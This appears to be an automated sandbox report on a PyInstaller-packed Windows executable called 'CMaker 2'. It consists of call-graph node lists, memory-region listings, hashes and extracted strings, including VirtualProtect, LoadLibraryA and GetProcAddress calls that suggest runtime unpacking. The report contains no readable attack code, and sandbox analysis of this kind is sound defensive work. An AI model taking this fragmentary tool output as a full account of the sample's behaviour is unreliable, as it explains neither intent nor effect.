7ff6fabe19fd 80335->80336 80337 7ff6fabe1bd0 49 API calls 80336->80337 80338 7ff6fabe1a48 
80337->80338 80339 7ff6fabeeacc 73 API calls 80338->80339 80340 7ff6fabe1a6c 80339->80340 80341 7ff6fabe1a81 80340->80341 80342 7ff6fabe1a99 80340->80342 80425 7ff6fabe1db0 80 API calls 80341->80425 80343 7ff6fabee794 _fread_nolock 53 API calls 80342->80343 80345 7ff6fabe1aae 80343->80345 80346 7ff6fabe1ab4 80345->80346 80347 7ff6fabe1acc 80345->80347 80426 7ff6fabe1db0 80 API calls 80346->80426 80427 7ff6fabee508 37 API calls 2 library calls 80347->80427 80350 7ff6fabe1ae6 80351 7ff6fabe1df0 81 API calls 80350->80351 80350->80352 80351->80352 80352->80322 80354 7ff6fabe704a 80353->80354 80355 7ff6fabe7800 2 API calls 80354->80355 80356 7ff6fabe7069 GetEnvironmentVariableW 80355->80356 80357 7ff6fabe70d2 80356->80357 80358 7ff6fabe7086 ExpandEnvironmentStringsW 80356->80358 80359 7ff6fabea9b0 _log10_special 8 API calls 80357->80359 80358->80357 80360 7ff6fabe70a8 80358->80360 80362 7ff6fabe70e4 80359->80362 80428 7ff6fabe78b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 80360->80428 80362->80172 80363 7ff6fabe70ba 80364 7ff6fabea9b0 _log10_special 8 API calls 80363->80364 80365 7ff6fabe70ca 80364->80365 80365->80172 80429 7ff6fabe4d50 80366->80429 80370 7ff6fabe2261 80374 7ff6fabe2279 80370->80374 80499 7ff6fabe4a60 80370->80499 80372 7ff6fabe226d 80372->80374 80508 7ff6fabe4bf0 81 API calls 80372->80508 80375 7ff6fabe2560 80374->80375 80376 7ff6fabe256e 80375->80376 80377 7ff6fabe257f 80376->80377 80558 7ff6fabe73b0 FreeLibrary 80376->80558 80407 7ff6fabe59d0 FreeLibrary 80377->80407 80380 7ff6fabe6894 80379->80380 80381 7ff6fabe696b __vcrt_freefls 80380->80381 80382 7ff6fabeeacc 73 API calls 80380->80382 80381->80162 80383 7ff6fabe68b0 80382->80383 80383->80381 80559 7ff6fabf7664 80383->80559 80385 7ff6fabe68c5 80385->80381 80386 7ff6fabeeacc 73 API calls 80385->80386 80387 7ff6fabee794 _fread_nolock 53 API calls 80385->80387 80386->80385 80387->80385 80388->80170 80389->80164 80390->80190 80391->80199 80392->80206 80393->80181 80395 7ff6fabe1bd0 49 API 
calls 80394->80395 80396 7ff6fabe3240 80395->80396 80396->80192 80397->80210 80398->80219 80399->80222 80400->80228 80401->80234 80402->80220 80403->80233 80405->80217 80406->80214 80407->80236 80408->80288 80409->80288 80411 7ff6fabe25ac GetModuleFileNameW 80410->80411 80411->80294 80411->80295 80413 7ff6fabe772f FindClose 80412->80413 80414 7ff6fabe7742 80412->80414 80413->80414 80415 7ff6fabea9b0 _log10_special 8 API calls 80414->80415 80416 7ff6fabe2602 80415->80416 80416->80299 80416->80300 80417->80312 80418->80306 80419->80311 80420->80304 80421->80312 80422->80352 80423->80352 80424->80352 80425->80352 80426->80352 80427->80350 80428->80363 80430 7ff6fabe4d65 80429->80430 80431 7ff6fabe1bd0 49 API calls 80430->80431 80432 7ff6fabe4da1 80431->80432 80433 7ff6fabe4daa 80432->80433 80434 7ff6fabe4dcd 80432->80434 80435 7ff6fabe1df0 81 API calls 80433->80435 80436 7ff6fabe3210 49 API calls 80434->80436 80453 7ff6fabe4dc3 80435->80453 80437 7ff6fabe4de5 80436->80437 80438 7ff6fabe4e03 80437->80438 80439 7ff6fabe1df0 81 API calls 80437->80439 80509 7ff6fabe3140 80438->80509 80439->80438 80441 7ff6fabea9b0 _log10_special 8 API calls 80443 7ff6fabe224e 80441->80443 80443->80374 80460 7ff6fabe4ee0 80443->80460 80444 7ff6fabe4e1b 80446 7ff6fabe3210 49 API calls 80444->80446 80445 7ff6fabe73d0 3 API calls 80445->80444 80447 7ff6fabe4e34 80446->80447 80448 7ff6fabe4e59 80447->80448 80449 7ff6fabe4e39 80447->80449 80515 7ff6fabe73d0 80448->80515 80450 7ff6fabe1df0 81 API calls 80449->80450 80450->80453 80452 7ff6fabe4e66 80454 7ff6fabe4e72 80452->80454 80455 7ff6fabe4ea9 80452->80455 80453->80441 80456 7ff6fabe7800 2 API calls 80454->80456 80520 7ff6fabe42e0 124 API calls 80455->80520 80458 7ff6fabe4e8a 80456->80458 80519 7ff6fabe1ed0 80 API calls 80458->80519 80521 7ff6fabe3eb0 80460->80521 80462 7ff6fabe4f1a 80463 7ff6fabe4f33 80462->80463 80464 7ff6fabe4f22 80462->80464 80528 7ff6fabe3680 80463->80528 80465 7ff6fabe1df0 81 API calls 80464->80465 80471 7ff6fabe4f2e 
80465->80471 80468 7ff6fabe4f3f 80470 7ff6fabe1df0 81 API calls 80468->80470 80469 7ff6fabe4f50 80472 7ff6fabe4f5f 80469->80472 80473 7ff6fabe4f70 80469->80473 80470->80471 80471->80370 80474 7ff6fabe1df0 81 API calls 80472->80474 80532 7ff6fabe3930 80473->80532 80474->80471 80476 7ff6fabe4f8b 80477 7ff6fabe4f8f 80476->80477 80478 7ff6fabe4fa0 80476->80478 80479 7ff6fabe1df0 81 API calls 80477->80479 80480 7ff6fabe4faf 80478->80480 80481 7ff6fabe4fc0 80478->80481 80479->80471 80482 7ff6fabe1df0 81 API calls 80480->80482 80539 7ff6fabe37d0 80481->80539 80482->80471 80485 7ff6fabe4fcf 80487 7ff6fabe1df0 81 API calls 80485->80487 80486 7ff6fabe4fe0 80488 7ff6fabe4fef 80486->80488 80489 7ff6fabe5000 80486->80489 80487->80471 80490 7ff6fabe1df0 81 API calls 80488->80490 80491 7ff6fabe5011 80489->80491 80493 7ff6fabe5022 80489->80493 80490->80471 80492 7ff6fabe1df0 81 API calls 80491->80492 80492->80471 80496 7ff6fabe504c 80493->80496 80553 7ff6fabf704c 73 API calls 80493->80553 80495 7ff6fabe503a 80554 7ff6fabf704c 73 API calls 80495->80554 80496->80471 80497 7ff6fabe1df0 81 API calls 80496->80497 80497->80471 80500 7ff6fabe4a80 80499->80500 80500->80500 80501 7ff6fabe4aa9 80500->80501 80505 7ff6fabe4ac0 __vcrt_freefls 80500->80505 80502 7ff6fabe1df0 81 API calls 80501->80502 80503 7ff6fabe4ab5 80502->80503 80503->80372 80504 7ff6fabe1420 113 API calls 80504->80505 80505->80504 80506 7ff6fabe1df0 81 API calls 80505->80506 80507 7ff6fabe4bcb 80505->80507 80506->80505 80507->80372 80508->80374 80510 7ff6fabe314a 80509->80510 80511 7ff6fabe7800 2 API calls 80510->80511 80512 7ff6fabe316f 80511->80512 80513 7ff6fabea9b0 _log10_special 8 API calls 80512->80513 80514 7ff6fabe3197 80513->80514 80514->80444 80514->80445 80516 7ff6fabe7800 2 API calls 80515->80516 80517 7ff6fabe73e4 LoadLibraryExW 80516->80517 80518 7ff6fabe7403 __vcrt_freefls 80517->80518 80518->80452 80519->80453 80520->80453 80522 7ff6fabe3edc 80521->80522 80523 7ff6fabe3ee4 80522->80523 80524 7ff6fabe4084 
80522->80524 80555 7ff6fabf68c4 48 API calls 80522->80555 80523->80462 80525 7ff6fabe4247 __vcrt_freefls 80524->80525 80526 7ff6fabe33b0 47 API calls 80524->80526 80525->80462 80526->80524 80529 7ff6fabe36b0 80528->80529 80530 7ff6fabea9b0 _log10_special 8 API calls 80529->80530 80531 7ff6fabe371a 80530->80531 80531->80468 80531->80469 80533 7ff6fabe399f 80532->80533 80535 7ff6fabe394b 80532->80535 80557 7ff6fabe3530 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 80533->80557 80538 7ff6fabe398a 80535->80538 80556 7ff6fabe3530 MultiByteToWideChar MultiByteToWideChar __vcrt_freefls 80535->80556 80536 7ff6fabe39ac 80536->80476 80538->80476 80540 7ff6fabe37e5 80539->80540 80541 7ff6fabe1bd0 49 API calls 80540->80541 80542 7ff6fabe3831 80541->80542 80543 7ff6fabe38b7 __vcrt_freefls 80542->80543 80544 7ff6fabe1bd0 49 API calls 80542->80544 80546 7ff6fabea9b0 _log10_special 8 API calls 80543->80546 80545 7ff6fabe3870 80544->80545 80545->80543 80548 7ff6fabe7800 2 API calls 80545->80548 80547 7ff6fabe390c 80546->80547 80547->80485 80547->80486 80549 7ff6fabe388a 80548->80549 80550 7ff6fabe7800 2 API calls 80549->80550 80551 7ff6fabe38a1 80550->80551 80552 7ff6fabe7800 2 API calls 80551->80552 80552->80543 80553->80495 80554->80496 80555->80522 80556->80538 80557->80536 80558->80377 80560 7ff6fabf7694 80559->80560 80563 7ff6fabf7170 80560->80563 80562 7ff6fabf76ad 80562->80385 80564 7ff6fabf71ba 80563->80564 80565 7ff6fabf718b 80563->80565 80573 7ff6fabf4f7c EnterCriticalSection 80564->80573 80574 7ff6fabfa3d8 37 API calls 2 library calls 80565->80574 80568 7ff6fabf71bf 80569 7ff6fabf71dc 38 API calls 80568->80569 80570 7ff6fabf71cb 80569->80570 80571 7ff6fabf4f88 _fread_nolock LeaveCriticalSection 80570->80571 80572 7ff6fabf71ab 80571->80572 80572->80562 80574->80572 80575 7ffd935bffe0 80576 7ffd935bfff0 80575->80576 80577 7ffd935c0000 80576->80577 80581 7ffd935a14bf 80576->80581 80585 7ffd935a1e01 80576->80585 80589 7ffd935fec4c 80576->80589 80581->80577 80582 
7ffd935fe560 80581->80582 80583 7ffd935fed9f SetLastError 80582->80583 80584 7ffd935fedb3 80582->80584 80583->80584 80584->80577 80585->80577 80586 7ffd935fe680 80585->80586 80587 7ffd935fed9f SetLastError 80586->80587 80588 7ffd935fedb3 80586->80588 80587->80588 80588->80577 80590 7ffd935fed60 80589->80590 80591 7ffd935fed9f SetLastError 80590->80591 80592 7ffd935fedb3 80590->80592 80591->80592 80592->80577 80593 7ffd9dfc8962 80594 7ffd9dfc898a 80593->80594 80595 7ffd9dfc8998 80593->80595 80596 7ffd9dfc8a36 80595->80596 80599 7ffd9dfc8a49 80595->80599 80600 7ffd9dfc4080 80595->80600 80596->80599 80604 7ffd9dfd1660 80596->80604 80602 7ffd9dfc4101 80600->80602 80601 7ffd9dfc449e 80601->80596 80602->80601 80603 7ffd9dfc4470 00007FFD8F8595C0 80602->80603 80603->80601 80603->80602 80605 7ffd9dfd1679 80604->80605 80623 7ffd9dfd168e 80605->80623 80626 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80605->80626 80607 7ffd9dfd1822 80607->80623 80627 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80607->80627 80609 7ffd9dfd195e 80609->80623 80628 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80609->80628 80611 7ffd9dfd1af8 80611->80623 80629 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80611->80629 80613 7ffd9dfd1c73 80613->80623 80630 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80613->80630 80615 7ffd9dfd1dee 80615->80623 80631 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80615->80631 80617 7ffd9dfd1f70 80617->80623 80632 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80617->80632 80619 7ffd9dfd20f2 80619->80623 80633 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80619->80633 80621 7ffd9dfd22bc 80621->80623 80634 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80621->80634 80623->80599 80624 7ffd9dfd2437 80624->80623 80635 7ffd9dfc38b0 00007FFDB2245630 00007FFDB2245630 00007FFDB2245630 80624->80635 80626->80607 
80627->80609 80628->80611 80629->80613 80630->80615 80631->80617 80632->80619 80633->80621 80634->80624 80635->80623 80636 7ffd9f3b7f40 80637 7ffd9f3b7f6c 80636->80637 80640 7ffd9f3b2590 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 80637->80640 80639 7ffd9f3b8027 80640->80639 80641 7ff6fabf9519 80653 7ff6fabf9fd8 80641->80653 80643 7ff6fabf951e 80644 7ff6fabf9545 GetModuleHandleW 80643->80644 80645 7ff6fabf958f 80643->80645 80644->80645 80651 7ff6fabf9552 80644->80651 80646 7ff6fabf941c 11 API calls 80645->80646 80647 7ff6fabf95cb 80646->80647 80648 7ff6fabf95d2 80647->80648 80649 7ff6fabf95e8 11 API calls 80647->80649 80650 7ff6fabf95e4 80649->80650 80651->80645 80652 7ff6fabf9640 GetModuleHandleExW GetProcAddress FreeLibrary 80651->80652 80652->80645 80658 7ff6fabfacd0 45 API calls 3 library calls 80653->80658 80655 7ff6fabf9fe1 80659 7ff6fabfa08c 45 API calls 2 library calls 80655->80659 80658->80655 80660 7ffd93611360 80661 7ffd93611378 80660->80661 80662 7ffd93611486 80661->80662 80664 7ffd935a1c1c 80661->80664 80664->80661 80666 7ffd935e6fb0 80664->80666 80667 7ffd935e7079 80666->80667 80668 7ffd935a1a0f 80666->80668 80667->80661 80668->80666 80671 7ffd935eaaa0 80668->80671 80669 7ffd935a14ec SetLastError 80669->80671 80670 7ffd935eb87f 80672 7ffd935eb8aa 00007FFDB2246570 80670->80672 80677 7ffd935eac23 80670->80677 80671->80669 80671->80670 80671->80677 80673 7ffd935eb8cb 00007FFDB2246570 80672->80673 80672->80677 80674 7ffd935eb8eb 00007FFDB2246570 80673->80674 80673->80677 80675 7ffd935eb902 00007FFDB2246570 80674->80675 80674->80677 80676 7ffd935eb91a 00007FFDB2246570 80675->80676 80675->80677 80676->80677 80677->80666 80678 7ffd8f787b30 80679 7ffd8f787b48 80678->80679 80684 7ffd8f7886d1 80678->80684 80680 7ffd8f788639 VirtualProtect VirtualProtect 80679->80680 80681 7ffd8f7885de LoadLibraryA 80679->80681 80680->80684 80683 7ffd8f7885f8 80681->80683 80683->80679 80685 7ffd8f788617 GetProcAddress 80683->80685 
80685->80683 80686 7ffd8f78862e 80685->80686 80687 7ff6fabe9f50 80688 7ff6fabe9f7e 80687->80688 80689 7ff6fabe9f65 80687->80689 80689->80688 80692 7ff6fabfd444 80689->80692 80693 7ff6fabfd48f 80692->80693 80697 7ff6fabfd453 _get_daylight 80692->80697 80700 7ff6fabfb108 11 API calls _get_daylight 80693->80700 80694 7ff6fabfd476 HeapAlloc 80696 7ff6fabe9fde 80694->80696 80694->80697 80697->80693 80697->80694 80699 7ff6fac03390 EnterCriticalSection LeaveCriticalSection _get_daylight 80697->80699 80699->80697 80700->80696 80701 7ffd9f3b1350 80703 7ffd9f3b136f 80701->80703 80702 7ffd9f3b143d 80703->80702 80703->80703 80705 7ffd9f3b1460 80703->80705 80707 7ffd9f3b1486 80705->80707 80706 7ffd9f3b3600 80707->80706 80710 7ffd9f3b14c8 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind 80707->80710 80709 7ffd9f3b14a6 80709->80702 80710->80709 80711 7ffd8fd99f90 80716 7ffd8fd9ab86 80711->80716 80719 7ffd8fd99fa8 80711->80719 80712 7ffd8fd9aa93 LoadLibraryA 80713 7ffd8fd9aaad 80712->80713 80717 7ffd8fd9aacc GetProcAddress 80713->80717 80713->80719 80715 7ffd8fd9aaee VirtualProtect VirtualProtect 80715->80716 80716->80716 80717->80713 80718 7ffd8fd9aae3 80717->80718 80719->80712 80719->80715
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
• API String ID: 0-2781224710
• Opcode ID: 0ab4d58f5bb155752d9913eb62b0d51a30b311dd7c242be745a741accbf05ac2
• Instruction ID: e10717c2340c17a6a31e7be9722d50b95530c1ec4790e4e107f13359f9c77f09
• Opcode Fuzzy Hash: 0ab4d58f5bb155752d9913eb62b0d51a30b311dd7c242be745a741accbf05ac2
• Instruction Fuzzy Hash: F4928831B0C682A1FBB5DBE1D4A07B927E8EF89B85F444032EA5E67695DE3CE540C301

Control-flow Graph

Control-flow graph for the function at 7ff6fac06a4c (rendered basic-block and edge list omitted here). API calls reached in the graph: CreateFileW, GetFileType, GetLastError, CloseHandle.
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: ad8ec9179d343e41af190c9267fc60de618bf9d8d7a5f79036b78aa83a48160c
• Instruction ID: 0f5ea9560eb0f925106174c7a36dd0a7adb4d7ab6b2d4c5e30e5c30f37ae0354
• Opcode Fuzzy Hash: ad8ec9179d343e41af190c9267fc60de618bf9d8d7a5f79036b78aa83a48160c
• Instruction Fuzzy Hash: F4C1C276B28A4185EB10CFA8C4906AC3771EB49BA8B059279DE6ED77D4EF38D055C300
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2263360051.00007FFD8FD99000.00000080.00000001.01000000.00000009.sdmp, Offset: 00007FFD8F7C0000, based on PE: true
• Associated: 00000005.00000002.2262570350.00007FFD8F7C0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8F7C1000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8FA5A000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8FB16000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8FB3B000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8FBD5000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8FBD8000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8FCE0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8FD21000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8FD2B000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8FD76000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2262592946.00007FFD8FD8D000.00000040.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.2263393868.00007FFD8FD9B000.00000004.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd8f7c0000_CMaker 2.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID: 2v]
• API String ID: 3300690313-3021020117
• Opcode ID: fc96ffb827da1029fa5bea12a6b773e25418914b814a1fa6a1f0ad0adcbac6d3
• Instruction ID: 55f5bb9fd160270c9dc36f40f58ee46d127eafa02695b8a81189b21c2f436552
• Opcode Fuzzy Hash: fc96ffb827da1029fa5bea12a6b773e25418914b814a1fa6a1f0ad0adcbac6d3
• Instruction Fuzzy Hash: 8B62F03372819286E7198A78951437D77E0F748785F449632EBAFC3784EA3CEA45CB40
APIs
Memory Dump Source
• Source File: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
• Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
• Opcode ID: 86e5d6e969dcccc1ed6c727ccbbd95dd599b1fe2912619a2b927021ef4f7fb99
• Instruction ID: 7ba42745a97f221e00f099e125c30dcec6be845d227af4088ab87ec3fa0d4596
• Opcode Fuzzy Hash: 86e5d6e969dcccc1ed6c727ccbbd95dd599b1fe2912619a2b927021ef4f7fb99
• Instruction Fuzzy Hash: 47622A227281D18AE7298EB8D41527DB6E0F744786F045635EADEC37C4FA7CEA49C710
APIs
Memory Dump Source
• Source File: 00000005.00000002.2262504499.00007FFD8F787000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FFD8F290000, based on PE: true
• Associated: 00000005.00000002.2261414623.00007FFD8F290000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F291000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F2A2000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F2B2000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F2B8000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F302000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F317000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F327000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F32E000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F33C000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F5F9000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F5FB000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F632000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F672000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F6CA000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F73A000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F76F000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2261490839.00007FFD8F781000.00000040.00000001.01000000.00000011.sdmp
• Associated: 00000005.00000002.2262533228.00007FFD8F789000.00000004.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd8f290000_CMaker 2.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
• Opcode ID: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
• Instruction ID: 1e2e54d5e0caa6a126efc3d469d2bd222d8c8afb12da027c7ea048367e2b3941
• Opcode Fuzzy Hash: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
• Instruction Fuzzy Hash: 4262243672859286F7258F3AD81027D77A0F758786F145932EA9EC37C4EA3CEA45CB04
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 37842ddde8711f02792dbd714da93d21ca306dbea5d47a61d34bf991ce214254
• Instruction ID: 2e768a783a0a7ae22f38a0293df91a469b127e27269dcdeeee21dc2aad621e15
• Opcode Fuzzy Hash: 37842ddde8711f02792dbd714da93d21ca306dbea5d47a61d34bf991ce214254
• Instruction Fuzzy Hash: 5DF0C262B1864287F7A08B60F48936673A0FB84728F404775DA7E826D4EF3CD0498A00

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$hide-early$hide-late$minimize-early$minimize-late$pkg$pyi-contents-directory$pyi-hide-console$pyi-runtime-tmpdir
                                                                                                                                                                                  • API String ID: 514040917-560148345
                                                                                                                                                                                  • Opcode ID: 661437280b8b225c8070a1cf8d5dd25b30cd138fb2fa166c6713422b48c64e17
                                                                                                                                                                                  • Instruction ID: 130f31fdbc4349918dbaff94314c5bb4cc284975a580dc01475499f0f6d8ae25
                                                                                                                                                                                  • Opcode Fuzzy Hash: 661437280b8b225c8070a1cf8d5dd25b30cd138fb2fa166c6713422b48c64e17
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C027961A0C68390FF25EB20D8942F923A5AF56784FC451F2DA6EC62D6FF2CE558D310

Control-flow Graph

Control-flow graph of the function at 7ff6fabe18d0 (basic blocks 7ff6fabe18d0-7ff6fabe1bc5; no Windows API is called directly from the graph). The strings below identify it as the bootloader's archive-open routine: seek to the MEI cookie, read it, allocate the archive structure and read the table of contents. Graph rendering omitted.
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
